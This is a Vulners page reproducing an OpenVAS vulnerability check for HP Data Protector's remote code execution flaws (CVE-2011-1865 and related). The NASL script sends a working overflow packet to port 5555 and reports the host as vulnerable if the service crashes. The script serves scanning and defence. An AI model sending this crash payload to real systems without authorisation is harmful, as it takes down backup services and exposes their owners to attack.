HP (OpenView Storage) Data Protector Multiple RCE Vulnerabilities
🗓️ 01 Jul 2011 00:00:00Reported by Copyright (C) 2011 Greenbone AGType
openvas🔗 plugins.openvas.org👁 31 Views
| Reporter | Title | Published | Views | Family All 59 |
|---|---|---|---|---|
| HP Data Protector 6.20 Multiple Vulnerabilities | 29 Jun 201100:00 | – | zdt | |
| HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability | 30 Jun 201100:00 | – | zdt | |
| HP OmniInet.exe Opcode 27 Buffer Overflow | 1 Jul 201100:00 | – | zdt | |
| HP OmniInet.exe Opcode 20 Buffer Overflow | 5 Jul 201100:00 | – | zdt | |
| CVE-2011-1865 | 29 Jun 201100:00 | – | circl | |
| CVE-2011-1866 | 30 Jun 201100:00 | – | circl | |
| Multiple vulnerabilities in HP Data Protector | 29 Jun 201100:00 | – | coresecurity | |
| HP Data Protector EXEC_CMD Buffer Overflow Vulnerability | 29 Jun 201100:00 | – | coresecurity | |
| HP OpenView Storage Data Protector EXEC_CMD Buffer Overflow (CVE-2011-1866) | 1 Nov 201100:00 | – | checkpoint_advisories | |
| HP OpenView Storage Stack Buffer Overflow (CVE-2011-1865) | 11 Jan 201200:00 | – | checkpoint_advisories |
10
| Source | Link |
|---|---|
| seclists | www.seclists.org/fulldisclosure/2011/Jun/552 |
| seclists | www.seclists.org/fulldisclosure/2011/Jun/551 |
| exploit-db | www.exploit-db.com/exploits/17458/ |
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:hp:data_protector";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.902454");
script_version("2026-04-28T06:28:06+0000");
script_tag(name:"last_modification", value:"2026-04-28 06:28:06 +0000 (Tue, 28 Apr 2026)");
script_tag(name:"creation_date", value:"2011-07-01 16:09:45 +0200 (Fri, 01 Jul 2011)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2011-1865", "CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1866");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"WillNotFix");
script_name("HP (OpenView Storage) Data Protector Multiple RCE Vulnerabilities");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2011 Greenbone AG");
script_family("Denial of Service");
script_dependencies("hp_data_protector_installed.nasl");
script_require_ports("Services/hp_dataprotector", 5555);
script_mandatory_keys("microfocus/data_protector/detected");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute
arbitrary code or may lead to denial of service conditions.");
script_tag(name:"affected", value:"HP (OpenView Storage) Data Protector 6.20 and prior.");
script_tag(name:"insight", value:"Multiple flaws are due to error in 'data protector inet' service
command which allows remote remote attackers to execute arbitrary code.");
script_tag(name:"summary", value:"HP (OpenView Storage) Data Protector is prone to multiple remote
code execution (RCE) vulnerabilities.");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore. General
solution options are to upgrade to a newer release, disable respective features, remove the
product or replace the product by another one.");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/17458/");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2011/Jun/552");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2011/Jun/551");
exit(0);
}
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE ) )
exit( 0 );
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit(0);
soc = open_sock_tcp( port );
if( ! soc )
exit( 0 );
headdata = raw_string( 0x00, 0x00, 0x27, 0xca, 0xff, 0xfe, 0x32,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x00,
0x00, 0x20, 0x00 );
middata = crap( data:raw_string( 0x61 ), length:10001 );
lastdata = raw_string( 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00 );
req = headdata + middata + lastdata;
send( socket:soc, data:req );
close( soc );
sleep( 5 );
soc = open_sock_tcp( port );
if( ! soc ) {
security_message( port:port );
exit( 0 );
} else {
response = recv( socket:soc, length:4096, timeout:20 );
if( "HP Data Protector" >!< response && "HPE Data Protector" >!< response && "HP OpenView Storage Data Protector" >!< response ) {
security_message( port:port );
exit( 0 );
}
}
close( soc );
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.88948